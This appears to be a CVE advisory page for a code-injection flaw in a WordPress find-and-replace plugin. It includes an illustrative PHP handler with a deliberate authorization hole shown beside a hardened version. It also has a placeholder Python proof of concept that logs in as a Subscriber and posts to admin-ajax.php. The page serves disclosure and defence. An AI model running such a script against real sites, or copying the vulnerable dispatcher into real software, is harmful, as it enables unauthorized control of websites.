Security Vulnerability Report
CVE-2025-9334 CVSS 8.8 HIGH

CVE-2025-9334

Published: 2025-11-08 06:15:41
Last Modified: 2026-04-15 00:35:42

Description

The Better Find and Replace – AI-Powered Suggestions plugin for WordPress is vulnerable to Limited Code Injection in all versions up to, and including, 1.7.7. This is due to insufficient input validation and restriction on the 'rtafar_ajax' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to call arbitrary plugin functions and execute code within those functions.
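The description names the bug class (CWE-94 via an AJAX handler that dispatches to plugin functions chosen by the caller) but the page does not reproduce the plugin's code. The block below is an added, illustrative example of that pattern in a generic WordPress plugin, followed by the hardened form a reviewer would ask for. It is not the plugin's own code: the class, hook, method and parameter names (`Example_Ajax_Vulnerable`, `wp_ajax_example_ajax`, `method`, `replace_in_db`, `example_ajax_nonce`) are invented for the example; the real handler referenced by the advisory is in RTAFAR_CustomAjax.php.

```php
<?php
/**
 * Illustrative pattern for the CVE-2025-9334 bug class (CWE-94 through
 * dynamic dispatch in a WordPress AJAX handler). NOT the plugin's own code:
 * every class, hook, method and parameter name here is invented for the
 * example; the real handler lives in RTAFAR_CustomAjax.php (see references).
 */

// ---- Vulnerable pattern --------------------------------------------------
class Example_Ajax_Vulnerable {

    public function __construct() {
        // wp_ajax_* runs for ANY authenticated user, Subscribers included.
        add_action( 'wp_ajax_example_ajax', array( $this, 'dispatch' ) );
    }

    public function dispatch() {
        // The method name comes straight from the request. is_user_logged_in()
        // and method_exists() are authentication and existence checks, not
        // authorization: a Subscriber can name any public method of the class.
        $method = isset( $_POST['method'] ) ? (string) $_POST['method'] : '';
        if ( is_user_logged_in() && method_exists( $this, $method ) ) {
            $this->$method( $_POST );   // attacker picks the function AND its arguments
        }
        wp_die();
    }

    // A privileged operation that should only ever be reachable by an admin:
    // rewrites every row of wp_options (siteurl, admin_email, active_plugins...).
    public function replace_in_db( $args ) {
        global $wpdb;
        $find    = isset( $args['find'] ) ? (string) $args['find'] : '';
        $replace = isset( $args['replace'] ) ? (string) $args['replace'] : '';
        $wpdb->query( $wpdb->prepare(
            "UPDATE {$wpdb->options} SET option_value = REPLACE(option_value, %s, %s)",
            $find,
            $replace
        ) );
        wp_send_json_success( array( 'rows' => $wpdb->rows_affected ) );
    }
}

// ---- Hardened pattern ----------------------------------------------------
// Same handler methods; only the dispatcher changes.
class Example_Ajax_Hardened extends Example_Ajax_Vulnerable {

    // Explicit allow-list: callable name => capability required to call it.
    private $handlers = array(
        'replace_in_db' => 'manage_options',
    );

    public function dispatch() {
        // 1. CSRF: nonce minted with wp_create_nonce( 'example_ajax_nonce' ) on
        //    the admin page and posted back as _ajax_nonce; dies on mismatch.
        check_ajax_referer( 'example_ajax_nonce', '_ajax_nonce' );

        // 2. Allow-list lookup instead of method_exists(): a name that is not
        //    in the table is rejected before any plugin code runs.
        $method = isset( $_POST['method'] ) ? sanitize_key( wp_unslash( $_POST['method'] ) ) : '';
        if ( ! isset( $this->handlers[ $method ] ) ) {
            wp_send_json_error( 'unknown method', 400 );
        }

        // 3. Authorization per handler: being logged in is not enough.
        if ( ! current_user_can( $this->handlers[ $method ] ) ) {
            wp_send_json_error( 'forbidden', 403 );
        }

        // 4. Handlers receive validated fields, never the raw superglobal.
        $args = array(
            'find'    => isset( $_POST['find'] ) ? sanitize_text_field( wp_unslash( $_POST['find'] ) ) : '',
            'replace' => isset( $_POST['replace'] ) ? sanitize_text_field( wp_unslash( $_POST['replace'] ) ) : '',
        );
        if ( '' === $args['find'] ) {
            wp_send_json_error( 'find must not be empty', 400 );
        }
        $this->{$method}( $args );
    }
}

new Example_Ajax_Hardened();
```

The vulnerable class is why the CVSS vector carries PR:L rather than PR:H: `wp_ajax_*` hooks fire for every logged-in account, so the only privilege the attacker needs is a Subscriber login. When auditing other plugins for the same class of bug, look for `$this->$var(...)`, `call_user_func(...)` or `call_user_func_array(...)` inside a `wp_ajax_` callback where `$var` is derived from `$_POST`, `$_GET` or `$_REQUEST` and the only gate is `is_user_logged_in()` or `method_exists()`.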

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Better Find and Replace plugin <= 1.7.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import sys

import requests
import urllib3

# CVE-2025-9334 PoC - Authenticated Code Injection in WordPress Plugin
# Target: Better Find and Replace Plugin <= 1.7.7
#
# The advisory names only the vulnerable function ('rtafar_ajax'); the
# registered AJAX action name and the parameters it forwards are not given
# on this page and must be read from RTAFAR_CustomAjax.php (see references).
# The 'action' value and 'param*' fields below are therefore placeholders.

# verify=False is used so the PoC works against self-signed lab targets;
# silence the InsecureRequestWarning it would otherwise print on every request.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def exploit(target_url, username, password, proxy=None):
    """
    Exploit the rtafar_ajax function to call arbitrary plugin methods.
    This PoC demonstrates calling a dangerous function via the vulnerable endpoint.
    """
    session = requests.Session()
    proxies = {'http': proxy, 'https': proxy} if proxy else None
    base = target_url.rstrip('/')

    # Step 1: Login to WordPress as the low-privilege (Subscriber) account.
    # wp-login.php rejects the POST with "Cookies are blocked" unless the
    # test cookie it normally sets on the GET is present, so set it up front.
    session.cookies.set('wordpress_test_cookie', 'WP Cookie check')
    login_url = base + '/wp-login.php'
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1',
    }
    session.post(login_url, data=login_data, proxies=proxies, verify=False)
    if not any(c.name.startswith('wordpress_logged_in') for c in session.cookies):
        print('[-] Login failed')
        return False
    print('[+] Login successful')

    # Step 2: Exploit the vulnerable AJAX endpoint.
    # wp_ajax_* handlers run for any authenticated user, so the Subscriber
    # session from Step 1 is enough to reach the dispatcher.
    ajax_url = base + '/wp-admin/admin-ajax.php'
    # Example: call an arbitrary plugin function via the action parameter.
    # Replace 'plugin_function_name' with the actual vulnerable function.
    exploit_data = {
        'action': 'rtafar_plugin_function_name',  # Vulnerable parameter (placeholder)
        'param1': 'malicious_value',              # Malicious input (placeholder)
        'param2': 'additional_payload',
    }
    resp = session.post(ajax_url, data=exploit_data, proxies=proxies, verify=False)
    # admin-ajax.php answers 400 with body "0" for an action nobody registered,
    # so a 200 here means the action name resolved to a handler.
    if resp.status_code == 200:
        print('[+] Exploit request sent')
        print(f'[+] Response: {resp.text[:500]}')
        return True
    print(f'[-] Exploit failed with status: {resp.status_code}')
    return False


if __name__ == '__main__':
    if len(sys.argv) < 4:
        print(f'Usage: python {sys.argv[0]} <target_url> <username> <password>')
        print('Example: python exploit.py http://target.com subscriber password123')
        sys.exit(1)
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    exploit(target, user, pwd)

References

Plugin source referenced by the advisory (plugins.trac.wordpress.org, trunk):
https://plugins.trac.wordpress.org/browser/real-time-auto-find-and-replace/trunk/core/actions/RTAFAR_CustomAjax.php#L29
https://plugins.trac.wordpress.org/browser/real-time-auto-find-and-replace/trunk/core/admin/functions/DbReplacer.php#L507
https://plugins.trac.wordpress.org/browser/real-time-auto-find-and-replace/trunk/core/lib/Util.php#L233

Changeset:
https://plugins.trac.wordpress.org/changeset/3389979/

Wordfence advisory:
https://www.wordfence.com/threat-intel/vulnerabilities/id/232f3a15-3bd3-44fa-aa07-f055e8fcda88?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-9334",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-08T06:15:41.270",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Better Find and Replace – AI-Powered Suggestions plugin for WordPress is vulnerable to Limited Code Injection in all versions up to, and including, 1.7.7. This is due to insufficient input validation and restriction on the 'rtafar_ajax' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to call arbitrary plugin functions and execute code within those functions."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-94"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/real-time-auto-find-and-replace/trunk/core/actions/RTAFAR_CustomAjax.php#L29",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/real-time-auto-find-and-replace/trunk/core/admin/functions/DbReplacer.php#L507",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/real-time-auto-find-and-replace/trunk/core/lib/Util.php#L233",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3389979/",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/232f3a15-3bd3-44fa-aa07-f055e8fcda88?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}